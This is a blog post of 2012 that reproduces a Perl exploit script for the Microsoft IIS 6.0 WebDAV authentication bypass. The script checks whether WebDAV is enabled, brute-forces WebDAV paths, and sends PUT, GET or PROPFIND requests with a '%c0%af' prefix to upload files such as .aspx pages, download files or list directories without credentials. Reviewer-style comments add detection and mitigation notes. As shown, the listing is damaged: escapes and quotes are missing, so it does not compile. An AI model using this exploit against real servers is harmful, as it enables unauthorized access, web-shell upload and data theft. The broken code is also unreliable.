

 

Sunday, January 29, 2012

MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 (perl)


#!/usr/bin/perl
#  ********* !!! WARNING !!! *********
#  *   FOR SECURITY TESTiNG ONLY!    *
#  ***********************************
#  MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
#  v1.1 adds brute-force directory function. 2009-05-29
#  v1.0 download/upload and list dir. 2009-05-24
#
#  Usage:
#               IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]
#               -target                                                         eg.: 192.168.1.1
#   -port                                                                       eg.: 80 
#   -method                                                             eg.: g
#    (p:PUT,g:GET,l:LIST)
#   -webdavpath                                         eg.: webdav 
#   -BruteForcePath                             eg.: brute force webdav path
#   -file       (optional)                      eg.: test.aspx
#  Example:
#               put a file:
#                               IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
#               get a file:
#                               IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
#               list dir:
#                               IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
#               brute force + list dir:
#                               IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
#               brute force + get file:
#                               IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx
  use IO::Socket;
use Getopt::Long; 
use threads;
use threads::shared;
# Overview of the main flow (there is no `use strict`/`use warnings`, so every
# variable not declared with `my` below is a package global shared with the
# subs at the bottom of the file): parse options -> print banner -> probe the
# server with OPTIONS (webdavtest, which exits on any negative result) ->
# optionally brute-force a WebDAV path (webdavbf) -> send one PUT, GET or
# PROPFIND whose path is prefixed with "%c0%af" -> report on the status line.
# NOTE(review): as transcribed on this page the string literals have lost
# their backslashes ("n", "rn", "t" where escapes are evidently meant) and
# the quotes embedded in the PROPFIND header/body strings are unescaped, so
# the listing does not compile as shown.  Comments describe the evident
# intent, not the literal bytes.
# Globals Go Here.
my $target;                             # Host being probed.
my $port;                                       # Webserver port.
my $method;                             # HTTP Method, PUT GET or PROPFIND (given as p/g/l).
my $xpath;                              # WebDAV path on Webserver.
my $bpath;                              # Bruteforce WebDAV path.
my $file;                                       # file name.
my $httpmethod;                         # HTTP verb derived from $method below.
my $Host_Header;        # The Host header has to be changed
# Long option names; the -t/-p/-m/-x/-b/-f forms shown in the header are
# presumably accepted through Getopt::Long's default unique-prefix matching.
# NOTE(review): Getopt::Long expects references as linkage (`\$target`); the
# bare `$target` here is consistent with the backslash loss noted above.
GetOptions( 
        "target=s"      => $target,
        "port=i"        => $port,
        "method=s"      => $method,
        "xpath=s"       => $xpath,
        "bpath=s"       => $bpath,
        "file=s"        => $file,
        "help|?"        => sub { 
                                hello();
                                exit(0); 
                           } ); 

# Argument validation.  $error is never declared, so it is a package global.
$error .= "Error: You must specify a target hostn" if ((!$target)); 
$error .= "Error: You must specify a target portn" if ((!$port)); 
$error .= "Error: You must specify a put,get or list methodn" if ((!$method)); 
$error .= "Error: You must specify a webdav pathn" if ((!$xpath) && (!$bpath)); 
# NOTE(review): `!=` is a numeric comparison; for the documented p/g/l values
# both operands are non-numeric strings that evaluate to 0, so this condition
# is never true and a missing -file is not reported here.
$error .= "Error: You must specify a upload or download file namen" if ((!$file) && $method != "l"); 
if ($error) { 
        print "Try $0 -help or -?' for more information.n$errorn" ; 
        exit; } 

hello();
# Map the one-letter method to the HTTP verb; "l" (list) becomes PROPFIND.
if ($method eq "p") {
        $httpmethod = "PUT";
} elsif ($method eq "g") {
  $httpmethod = "GET";
} elsif ($method eq "l") {
  $httpmethod = "PROPFIND";
} else {
  print "$method Method not accept !!!n";
  exit(0);
}
        # ************************************
# * We testing WebDAV methods first  *
# ************************************
# webdavtest exits the whole process unless the Server header says IIS, a
# DAV header is present and $httpmethod appears in the Public header.
webdavtest($target,$port);
#end of WebDAV testing.
# ****************************************
# * We try to brute forceing WebDAV path *
# ****************************************
# With -bpath the wordlist result replaces -xpath: webdavbf returns the first
# candidate that answers 401, or exits the process if none does.
if ($bpath) {
  $xpath = webdavbf($target,$port,$bpath);
}
#end of brute force
print "-" x 60 ."n";
# Build the request headers (and, for PUT/PROPFIND, the body) per verb.
if ($httpmethod eq "PUT") {
  my $content;
  my $data;
  #cacl file size
  $filesize = -s $file;
  print "$file size is $filesize bytesn";
  # NOTE(review): 2-arg open on a caller-supplied name; a leading '<', '>'
  # or '|' in $file would be taken as an open mode.  Three-arg open avoids that.
  open(INFO, $file) || die("Could not open file!");
  #@lines=<INFO>;
  binmode(INFO); #binary
  # Accumulate the whole file into $content (the loop covers short reads).
  while(read(INFO, $data, $filesize))
  { 
        $content .= $data;
  }
  close(INFO); 
  #print $content;
  
  # "Translate: f" is the IIS/WebDAV header asking for the raw file rather
  # than its processed output; Content-Length announces the upload size.
  $Host_Header = "Translate: frnHost: $targetrnContent-Length: $filesizern";
} elsif ($httpmethod eq "GET") {
        $Host_Header = "Translate: frnHost: $targetrnConnection: closernrn";
} elsif ($httpmethod eq "PROPFIND") {
        # NOTE(review): the headers declare Content-Length: 0 yet an XML
        # propfind body is appended on the next line; how the server treats
        # that mismatch is not something this listing shows.
        $Host_Header = "Host: $targetrnConnection: closernContent-Type: text/xml; charset="utf-8"rnContent-Length: 0rnrn";
        $Host_Header = $Host_Header."<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://apache.org/dav/props/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
}
print "-" x 60 ."n$httpmethod $file , Please wait ...n"."-" x 60 ."n";
# ************************
# * Sending HTTP request *
# ************************
# Every request path is "/%c0%af<xpath>/...": "%c0%af" is an overlong
# (non-shortest-form) UTF-8 encoding of "/".  Defender note: IIS W3C logs
# normally record the URI as received, so "%c0%af" -- or any other overlong
# sequence -- in a request to a WebDAV-enabled path is a high-fidelity
# indicator; applying the vendor's security update for this issue, or
# disabling WebDAV where it is not required, removes the precondition.
if ($httpmethod eq "PUT") {
  @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0rn$Host_Headerrn$content",$target,$port,10);
  # sendraw2 returns a one-element list ("0"/"Timeout") on failure, hence < 1.
  if ($#results < 1){die "10s timeout to $target on port $portn";}
} elsif ($httpmethod eq "GET") {
        @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0rn$Host_Header",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $portn";}
} elsif ($httpmethod eq "PROPFIND") {
        @results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0rn$Host_Header",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $portn";}
}
#print @results;
# Classify by status line: 2xx -> "on", 4xx -> "off"; anything else (3xx,
# 5xx, no HTTP status line) leaves the default "off".
$flag="off";
if ($results[0] =~ m|^HTTP/1.[01] 2[0-9][0-9] |){
        $flag="on";
} elsif ($results[0] =~ m|^HTTP/1.[01] 4[0-9][0-9] |){
        $flag="off";
}       
print "-" x 60 ."n";
if ($flag eq "on") {
  if ($httpmethod eq "PUT") {
          print "$httpmethod $file from [$target:$port/$xpath] OKrn";
  } elsif ($httpmethod eq "GET") {
    # Locate the "Accept-Ranges: bytes" header line; the body is assumed to
    # start two lines after it (skipping the blank header/body separator),
    # i.e. that header is assumed to be the last one in the reply.
    my $line_no = 0;
    my $counter = @results;
    foreach $line (@results){
          ++$line_no;
            if ($line =~ /^Accept-Ranges: bytesrn/){
                  last;
            }
    }

    # Write file to disk
    # NOTE(review): 2-arg open writes to the -file name as given (relative to
    # the current directory).  $line_no+1 is the 0-based index of the first
    # body line; $counter is the element count, so the slice's last index is
    # one past the end (undef).  If Accept-Ranges is absent the slice is empty.
    open(OUTFILE, ">$file") or die "Could not write to file: $!n";
    binmode (OUTFILE);
    print OUTFILE @results[$line_no+1..$counter];
    close(OUTFILE);      
     
          print "$httpmethod $file from [$target:$port/$xpath] OKrnPlease check $file on local diskrn";   
          
  } elsif ($httpmethod eq "PROPFIND") {
    print "$httpmethod path list from [$target:$port/$xpath] OKrn";
    # Print every href from the first XML line: split on the "<a:href>" tag
    # (the prefix this code expects IIS to use in its Multi-Status reply) and
    # keep each fragment up to its next "<".  The fragment before the first
    # tag is emitted too.  NOTE(review): as written `<?` makes the "<"
    # optional, so the pattern matches "xml version=" at line start; the
    # intended literal "<?xml" is again consistent with the backslash loss.
        foreach $line (@results){
            if ($line =~ /^<?xml version=/i){
                  my @list = split("<a:href>", $line);
                  foreach $path (@list) {
                        $no = index($path,"<");
                        $result.=substr($path, 0, $no)."n";
                  }
                  print $result;
                  last;
            }
    }
  }
} else {
        print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!rn";
}
print "-" x 60 ."n";
exit(0);

# *************
# * Sendraw-2 *
# *************
sub sendraw2 {
  # Send $pstr verbatim over a new TCP connection to $realip:$realport and
  # return every line read until the peer closes the connection.  Returns
  # the one-element list ("0") when connect fails and "Timeout" when the
  # timeout flag is seen, so callers test `$#results < 1`.  Uses the
  # bareword global handle S and alarm() around both the connect and the
  # read phase.
  my ($pstr,$realip,$realport,$timeout)=@_;
  my $target2 = inet_aton($realip);       # packed IPv4 address (Socket, via IO::Socket)
  my $flagexit=0;                         # lexical; ermm() sets the package $flagexit instead
  # NOTE(review): as written `&ermm` *calls* ermm immediately (closing S
  # before it exists) and stores its return value; it does not install a
  # handler, so a firing alarm takes SIGALRM's default action and ends the
  # process.  Given the backslash loss elsewhere on this page the original
  # most likely read `\&ermm`.
  $SIG{ALRM}=&ermm;
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
  alarm($timeout);
  # Hand-packed sockaddr_in: family 2 (AF_INET), big-endian 16-bit port,
  # 4-byte address, 8 bytes of zero padding.
  if (connect(S,pack "SnA4x8",2,$realport,$target2)){
    alarm(0);
    my @in;
    # Make S the default output handle with autoflush so the bare print
    # below writes the request to the socket; STDOUT is restored further down.
    select(S); $|=1;
    print $pstr;
    alarm($timeout);
    while(<S>){
      # Never true: this is the lexical $flagexit above, which nothing
      # assigns to.  If it were taken, the default handle would stay on S.
      if ($flagexit == 1){
        close (S);
        print STDOUT "Timeoutn";
        return "Timeout";
      }
      push @in, $_;
    }
    alarm(0);
    select(STDOUT);
    close(S);
    return @in;
  } else {return "0";}
}

sub ermm{
        # Intended SIGALRM handler: flag the timeout and close the shared
        # socket handle S.  $flagexit here is a package global (no `my`), not
        # the lexical inside sendraw2, and sendraw2 assigns `&ermm` (a call)
        # rather than a code reference, so as transcribed this runs once at
        # setup instead of when the alarm fires.
        $flagexit=1;
        close (S);
}

sub webdavtest {
        # Probe the server with "OPTIONS /" and exit(0) unless the reply
        # names Microsoft-IIS in Server:, carries a DAV: header, and lists
        # $httpmethod in Public:.  Writes the globals @results, $flag, $line,
        # $left and $right, and reads $target/$httpmethod from the main
        # script (messages use $target, not the $testip parameter).  Has no
        # return value; success simply falls through.
        my ($testip,$testport)=@_;
  print "-" x 60 ."n";
  print "Testing WebDAV methods [$testip $testport]n";
  print "-" x 60 ."n";
  @results=sendraw2("OPTIONS / HTTP/1.0rnrn",$testip,$testport,10);
  if ($#results < 1){die "10s timeout to $target on port $testportn";}
  #print @results;
  $flag="off";
  foreach $line (@results){
          # "Server: <product>": keep the value with spaces removed; $right
          # still carries its line terminator, hence no newline in the print.
          if ($line =~ /^Server: /){
                  ($left,$right)=split(/:/,$line);
                  $right =~ s/ //g; 
                  print "$target : Server type is : $right";

            if ($right !~ /Microsoft-IIS/i){
                    print "$target : Not a Microsoft IIS Servern";
                    exit(0);
            }
          }
        
          # Any DAV: header marks WebDAV as enabled.
          if ($line =~ /^DAV: /){
                  $flag="on";
          }
        
          # "Public:" lists the verbs the server advertises; the chosen verb
          # must appear in it.  Relies on DAV: preceding Public: in the reply.
          # Defender note: disabling WebDAV where it is not needed, or
          # restricting the advertised verbs, is exactly what fails this check.
          if ($line =~ /^Public: / && $flag eq "on"){
            ($left,$right)=split(/:/,$line);
            $right =~ s/ //g; 
            print "$target : Method type is : $right";
            if ($right !~ /$httpmethod/i){
              print "$target : Not allow $httpmethod on this WebDAV Servern";
              exit(0);
            } else {
              $flag="on";
            }
          }             
  }
  if ($flag eq "off") {
    print "$target : WebDAV disablen";
    exit(0);    
  }
}

sub webdavbf {
        # Read candidate directory names, one per line, from the wordlist
        # file $bfpath and send a plain "PROPFIND /<name>/" (no "%c0%af"
        # prefix) for each; the first reply with status 401 is treated as an
        # existing, credential-protected WebDAV path and returned.  Exits the
        # process when the list is exhausted.  Defender note: this stage is
        # ordinary directory enumeration -- a burst of PROPFIND requests to
        # mostly non-existent paths from one client is itself a detectable
        # pattern in the server logs.
        my ($bfip,$bfport,$bfpath)=@_;
  print "-" x 60 ."n";
  print "Try to brute forceing WebDAV path ...n";
  print "-" x 60 ."n";
  # NOTE(review): 2-arg open on a caller-supplied name (same caveat as the
  # PUT branch of the main script); `foreach (<BF>)` also reads the whole
  # list into memory before iterating.
  open(BF, $bfpath) || die("Could not open file!");
  foreach $lines (<BF>){
        chomp($lines);

          # Loop-invariant: identical headers and body are rebuilt on every
          # iteration, overwriting the main script's $Host_Header.
          $Host_Header = "Host: $bfiprnConnection: closernContent-Type: text/xml; charset="utf-8"rnContent-Length: 0rnrn";
          $Host_Header = $Host_Header."<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://apache.org/dav/props/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
          
          @results=sendraw2("PROPFIND /$lines/ HTTP/1.0rn$Host_Header",$bfip,$bfport,10);
    if ($#results < 1){die "10s timeout to $bfip on port $bfportn";}
    
    print "[$lines]...$results[0]";
    
        #maybe this response
        #HTTP/1.1 207 Multi-Status
    # A 401 means the path exists but demands credentials; that is the case
    # the main request is aimed at.  The `last` after `return` is unreachable.
    if ($results[0] =~ m|^HTTP/1.[01] 401 |){
        print "Find out path on [$lines]n";
            return $lines;
            last;
    }
  }
  close(BF) ;
  print "Sorry... We can not find any more path... :(n";
  exit(0);
}

sub hello{
  # Print the banner and usage text; called for -help/-? (followed by exit)
  # and once unconditionally before the OPTIONS probe.  The banner still says
  # V1.0 although the header comment documents v1.1.  The "t"/"n" runs are
  # tab/newline escapes whose backslashes were lost in transcription; the
  # trailing `;` after the closing brace is a harmless empty statement.
  print "n"; 
  print "t ###################################################n"; 
  print "t #    MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0  #n"; 
  print "t #  **************** !!! WARNING !!! **************#n"; 
  print "t #  **** FOR PRIVATE AND EDUCATIONAL USE ONLY! ****#n"; 
  print "t #  ***********************************************#n"; 
  print "t #  Written by csgcsg 2009-05-29                   #n"; 
  print "t ###################################################n"; 
  print "nt $0 -target -port -method -webdavpath [-file]n";
  print "nt -targetttt eg.: 192.168.1.1n"; 
  print "t -porttttt eg.: 80n"; 
  print "t -methodttt eg.: gn"; 
  print "t (p:PUT, g:GET, l:LIST)n";
  print "t -webdavpath|-bruteForcePatht eg.: webdavn"; 
  print "t -filetttt eg.: test.aspxnn"; 
  print "t Usage eg.: nt  $0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspxn"; };




 

